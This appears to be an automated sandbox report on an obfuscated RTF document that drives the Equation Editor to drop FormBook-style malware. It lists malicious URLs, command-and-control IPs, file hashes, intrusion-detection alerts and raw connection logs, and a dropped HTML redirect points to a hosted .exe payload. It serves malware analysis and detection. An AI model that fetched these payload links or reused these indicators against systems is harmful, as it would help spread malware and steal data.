                                        AMAZONEXPANSIONGB | https://rjtlawfirm.sharefile.com/share/view/4e7ac2a69d944a41 | malicious | HTMLPhisher | 3.33.222.159
                                        AMAZONEXPANSIONGB | http://www.asercol.com/ | malicious | Unknown | 52.223.34.155
                                        AMAZONEXPANSIONGB | G7DyaA9iz9.exe | malicious | Pushdo | 3.33.130.190
                                        AMAZONEXPANSIONGB | http://usps.uspsbp.com/ | malicious | Unknown | 3.33.220.150
                                        AMAZONEXPANSIONGB | http://ky-df3.com | malicious | Unknown | 3.33.130.190
                                        AMAZONEXPANSIONGB | ekstre.exe | malicious | FormBook, GuLoader | 3.33.130.190
                                        AMAZONEXPANSIONGB | https://att-108191.weeblysite.com/ | malicious | Unknown | 52.223.40.198
                                        AMAZONEXPANSIONGB | https://znxbamdkwjcbas2562.top/ | malicious | HTMLPhisher | 52.223.22.214
                                        AMAZONEXPANSIONGB | https://att-100016.weeblysite.com/ | malicious | Unknown | 52.223.40.198
                                        AMAZONEXPANSIONGB | https://pitch.com/v/JW-Behavioral-Center-Project-Bid-Document-s8xcr7 | malicious | HTMLPhisher | 3.33.152.127
                                        AMAZONEXPANSIONGB | https://simpledialogue.net/captch/homesi/net/login.php | malicious | Unknown | 52.223.40.198
                                        AMAZONEXPANSIONGB | https://att-108191.weeblysite.com/ | malicious | Unknown | 3.33.220.150
                                        AMAZONEXPANSIONGB | https://rebrand.ly/hyjsfgx | malicious | Unknown | 3.33.143.57
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        7dcce5b76c8b17472d024758970a406b | NEWREST_Procurement.xlsx | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | DOCUMENTOVIEW_FACTURAEXPRESS_ESCANEAD_PDFN3D0L3BG5D.exe | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | sYfKrBVpjn.xlsx | malicious | FormBook, NSISDropper | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Quote_EXW..xlsx | malicious | FormBook, NSISDropper | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Script.SNH-gen.12817.4151.docx | malicious | Quasar | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Oder_S65392.xlsx | malicious | AgentTesla, NSISDropper | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | misure.exe | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva_Detalhes.ppam | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva_Detalhes.ppam | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | d#U044f.docx | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Order_Contract_8657645.xla.xlsx | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | approval_order_PO.docx.doc | malicious | Remcos | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Doc606112.xls | malicious | AgentTesla | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva.ppam | malicious | RevengeRAT | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Label-4800014530.docx.doc | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva_Cancelar.ppam | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva_Cancelar.ppam | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | ship.js | malicious | Unknown | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | Reserva_Detalhes.ppam | malicious | RevengeRAT | 103.224.247.210
                                        7dcce5b76c8b17472d024758970a406b | RESERVA.ppam | malicious | RevengeRAT | 103.224.247.210
                                        No context
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:HTML document, ASCII text
                                        Category:dropped
                                        Size (bytes):194
                                        Entropy (8bit):4.913737935545676
                                        Encrypted:false
                                        SSDEEP:6:AYSI0MXLxu2CAIuh7FUPMd3AZmpGWoEwM:zSabxiAIkBUP90pToa
                                        MD5:9F9D2481859AE4D1911AB9E558F07508
                                        SHA1:32A08519726621BC8669247E4ED809077C833AB7
                                        SHA-256:A11631564799E17C365DE2A5A880B6D0F18153134014A5EDA5B71CC625046676
                                        SHA-512:62B0800A12FC95DE3C68484DBC26C7E87D6FE9CBD836463B331A8EF6A4A133DADCFC6C2012E676DC45DA65087F2ACB9BFC75E7027931890C331294695A3C8995
                                        Malicious:false
                                        Reputation:low
                                        Preview:<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe">here</a></body>
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):345522
                                        Entropy (8bit):7.70573760188668
                                        Encrypted:false
                                        SSDEEP:6144:xBlL/8qFeJ/1IW4/DTgYKfHSAtiHbc2+x/D2LYTx0/BRtLuL3SqSY5dQVxS:X2qFWdIWQTgY2HSkiHbc2+5DLTKcxX
                                        MD5:B08C02AB269D1406728178E62017C3D4
                                        SHA1:DA33C4A1A8912C7D08CFB1BF77C59A813419BA64
                                        SHA-256:4169BC8EF83D44E5CD72DE2F88C40602F7840D578E1EC0BBDD9B2A874BB75C4C
                                        SHA-512:36516AB0FD27708F38CCEEBDE3AB532D3CAF57598D907A565828ABF999C7D798F5EA02CF99D6EC1F9A142158A22D7BF794D91221E68ED27965C6B509292C64CC
                                        Malicious:true
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................P...............................................t...........q...........................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc....q.......r...x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):1.0862650957458768
                                        Encrypted:false
                                        SSDEEP:6:sx+6Mulwc5NgREqAWlgFJAQDlll8vlwijlFwQFrB:4+5ulFk5uFJ/7uvqkKQZB
                                        MD5:130E0F23E1E679727C6E794A98DFEBB7
                                        SHA1:C9D85B40BA3CC2211F43DBF5A6214D71D46F3EDC
                                        SHA-256:A5B0749FF44E1BDBB14A8C60A2F2184C6EAA99CF1F6234A9C39E5A250A654A3C
                                        SHA-512:D46976FEBEEFF47CD35AF9228B9B025C893F386A686FABE0F6E33259F50C8425E897F874A11969428569BAD70CFD3F273DF2F22F84DD27A83599FCB39C16C1F5
                                        Malicious:false
                                        Preview:................9.6.6.2.0.7.8.1.4.3.7.4.4.1.4.9.3.0.7.3.5.5.2.3.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...........................................................................................................................................................................................................................................................................................................................................................................................................................B...D...J...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j`..i...CJ..OJ..QJ..U..^J..aJ.
                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):203776
                                        Entropy (8bit):6.346026797085734
                                        Encrypted:false
                                        SSDEEP:3072:EzV7OxQ1rAQChXoFwC6B83WvMgn3vAdtFJ1XjUQztpwWDWwmL7hQmFX565/GIXrC:EzVUQVshXo+9ASSTUQxSwYmmFJcro5
                                        MD5:9C416E56B341D900E2DFEC7595CC85EE
                                        SHA1:50036AC5E3AE4698945D9D979A5533EF48D344ED
                                        SHA-256:38E786FFD9E88C04DB2DADA4C569C07CBEAF2684FEAC986EC833A6C97EF12CF3
                                        SHA-512:1DB2C03E7261A05FF0513F92B94C808B32C66D9F01C8975544E494ACB2ECC33CA399844086916B8C87E73D24B1CBD9995F79B19DE320CC51627BF58667E7922E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....\e.................L........................@..........................p.......................................................................................................................s...............................................text...pK.......L.................. ..`.rdata.......`.......P..............@..@.data...\4.......(..................@....00cfg.......@......................@..@.tls.........P......................@....voltbl.j....`..................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):210425
                                        Entropy (8bit):7.993649505823361
                                        Encrypted:true
                                        SSDEEP:3072:acHD+Nt+R1EsKRB+0nquZH07MVetuY+5ih/RYsQZU4AH+Ueh0Kw9BA+t/GG6gj:ae1Esaxt07jtufch/6HtyJe5GAI/X6i
                                        MD5:E5420CCC616B60691918C7AB170CD28E
                                        SHA1:3ECB4822670DA0E1989102FC3D21CB84AE377D3A
                                        SHA-256:07C2C358CB69396A7F7E0EBA42619181E0E3054C4D75FC4E81F3808B0B9DFC29
                                        SHA-512:6B98D963BE0C8B5A14A98D878384E2FFC4428E344FA5383E1733D6C089FF535146C9D15D73AF36379FAD1B4CF73FCB001E0146E0896213A4E653F1644AF236DE
                                        Malicious:false
                                        Preview:....f../..a...u.]...(L'......T6.....d]...[....J.......j....O....B..}.1......`...o...+.W...*...D]NR....%....B9Km..wY...y.....F.f....%..z2=...-.-..G.R...jZ}t..*.b.&S.qm...1A..`G..z.6....$..U0H....6v..mp....k..K..0..>'....\...G0....@.W..#..v.TA../...X1.P..;.*..<=.\.`Z.......]..v[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A........6.v..$.~.0j7....v..mY./x=.-.12..0..>'...%.-...(....2@....#..vH..TA../....X1.P..?.*..<=.\.JZT6.....d]...[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A..`G..z.6....$...0j.a..6v..mY./x=.-.K2..0..>'...%.-...(....2@....#..vH..TA../....X1.P..?.*..<=.\.JZT6.....d]...[....J.......j...^O...N.B=..VX*....7A..@..M..2lu.T5./....M..L......_..Wm.W....y....D...[....n......,.v....@.u...aj..4..4$. .E......1A..`G..z.6....$...0j.a..6v..mY./x=.-.K2..0..>'.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Tue Nov 21 11:25:51 2023, length=3443, window=hide
                                        Category:dropped
                                        Size (bytes):1199
                                        Entropy (8bit):4.540809578612031
                                        Encrypted:false
                                        SSDEEP:24:8KbV/XTwdxO45HHyDJeNHHytDv3qEwk7N:8KbV/XTkd5HHeJuHHDEwiN
                                        MD5:279B3E83EA98BAFD8587081FAADFE3C2
                                        SHA1:5125E4FFF34256189E26CA141FE48DD7A6CE4B2C
                                        SHA-256:B8A1F272B088257F378124F90EE56AC1D9E6F9E3069386FCFBA92F7C27AA9D09
                                        SHA-512:DB97D748E4D8B51ABD54D5C74802C40A171792F26CF77D416A57120C8470E6BBFE69F73F004670C1FC8840BF1C732D4C41AA2363F196E5FB1A3F057CB5A2C4AA
                                        Malicious:false
                                        Preview:L..................F.... .......r.......r.....O.u...s............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WC...user.8......QK.X.WC.*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.s...uW:c .SECURI~1.RTF..........WC..WC.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...R.T.F...O.b.f.u.s.c.a.t.e.d.-.g.e.n...1.9.6.6.3...1.6.5.1.4...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\226533\Users.user\Desktop\SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...R.T.F...O.b.f.u.s.c.a.t.e.d.-.g.e.n...1.9.6.6.3...1.6.5.1.4...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):129
                                        Entropy (8bit):5.038678879902177
                                        Encrypted:false
                                        SSDEEP:3:H9rbJ12ZTAgRLp5om4P8bJ12ZTAgRLp5ov:H9rt12ZNd5jt12ZNd5y
                                        MD5:BFD257F822EF401F0FE69371316A0691
                                        SHA1:EDFFDCE568ECE72EC949B08E0A2F34E00EC91174
                                        SHA-256:429F327731ED96965057646D6731067881FC7B613BA254FA67B4754248819336
                                        SHA-512:0EDBACF16A845E9CB898900E8A3B6C990A938A8816F692EC2202A365F3191B1EFA489D09FFE60CEA4DFE4AC262F9C570CFF4AEC4C0B4ADEC08852B001E36418F
                                        Malicious:false
                                        Preview:[misc]..SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK=0..[folders]..SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK=0..
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):345522
                                        Entropy (8bit):7.70573760188668
                                        Encrypted:false
                                        SSDEEP:6144:xBlL/8qFeJ/1IW4/DTgYKfHSAtiHbc2+x/D2LYTx0/BRtLuL3SqSY5dQVxS:X2qFWdIWQTgY2HSkiHbc2+5DLTKcxX
                                        MD5:B08C02AB269D1406728178E62017C3D4
                                        SHA1:DA33C4A1A8912C7D08CFB1BF77C59A813419BA64
                                        SHA-256:4169BC8EF83D44E5CD72DE2F88C40602F7840D578E1EC0BBDD9B2A874BB75C4C
                                        SHA-512:36516AB0FD27708F38CCEEBDE3AB532D3CAF57598D907A565828ABF999C7D798F5EA02CF99D6EC1F9A142158A22D7BF794D91221E68ED27965C6B509292C64CC
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................P...............................................t...........q...........................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc....q.......r...x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                        File type:Rich Text Format data, version 1
                                        Entropy (8bit):4.135232264520108
                                        TrID:
                                        • Rich Text Format (5005/1) 55.56%
                                        • Rich Text Format (4004/1) 44.44%
                                        File name:SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
                                        File size:3'443 bytes
                                        MD5:db71e76c281983819c7259fd25618513
                                        SHA1:cfbeb69bdcf67546aafabb4dfe72ad4cbec77ec3
                                        SHA256:ddbd4b7c13d365eb339aad4d0e2deb0dff4b50287d5111f57ca8756f3746f940
                                        SHA512:6bc20e1a03fc37d5cbb74597fd694ae7a481c2c4d1a1fa10a54d66bc423538fc49022b65e534dfde1d9b29ecaf5db283733a12031f0d8890e0bbf81a03dc76bf
                                        SSDEEP:96:Of+TITOFimbXBrNKMnIRj2DhSUDmqNvmr:STOkmbRR3IgAUSqkr
                                        TLSH:39610BB947942CD2D893C4F0CA187CEA82B8F11782DEB551842CEC31197B12A7E7D982
                                        File Content Preview:{\rtf1.........{\*\bWModeBW549517209 \.}.{\296620781\object73414323\objlink92997226\objw5083\objh5169{\+\objupdate85292348529234\*\objdata51440{\*\fttruetype802692110 \bin00\499944563543248708}.{\qmspace689212854 \bin00\94374414930735523}.69ee3f0e02000000
                                        Icon Hash:2764a3aaaeb7bdbf
                                        Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                        00000008Bhno
                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        11/21/23-13:25:55.147417 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        11/21/23-13:26:55.450467 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49165 | 80 | 192.168.2.22 | 107.164.111.101
                                        11/21/23-13:27:15.263664 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 3.33.130.190
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 21, 2023 13:25:54.770240068 CET | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.136569023 CET | 80 | 49161 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:55.136800051 CET | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.147417068 CET | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.514156103 CET | 80 | 49161 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:55.514302969 CET | 49161 | 80 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.593086958 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.593139887 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:55.593209982 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.609181881 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:55.609200954 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:56.730706930 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:56.730827093 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:56.735972881 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:56.735980034 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:56.736287117 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:56.736344099 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:56.867254972 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:56.913253069 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.605598927 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.605658054 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.605695963 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.605775118 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:57.608815908 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:57.608834028 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.608890057 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:57.611144066 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:57.972647905 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.972661018 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.972743988 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.972872972 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:57.972888947 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:57.972945929 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340131044 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340142012 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340229034 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340243101 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340261936 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340295076 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340303898 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340344906 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340357065 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340398073 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340420008 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340424061 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.340439081 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340457916 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.340631962 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341008902 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341048956 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341068029 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341072083 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341083050 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341103077 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341103077 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341156006 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341167927 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341208935 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341222048 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341226101 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.341254950 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341463089 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.341463089 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708019972 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708030939 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708070993 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708137035 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708153963 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708187103 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708187103 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708195925 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708206892 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708247900 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708247900 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708256006 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708261967 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708266973 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.708313942 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.708589077 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709309101 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709362030 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
                                        Nov 21, 2023 13:25:58.709379911 CET | 49162 | 443 | 192.168.2.22 | 103.224.247.210
                                        Nov 21, 2023 13:25:58.709384918 CET | 443 | 49162 | 103.224.247.210 | 192.168.2.22
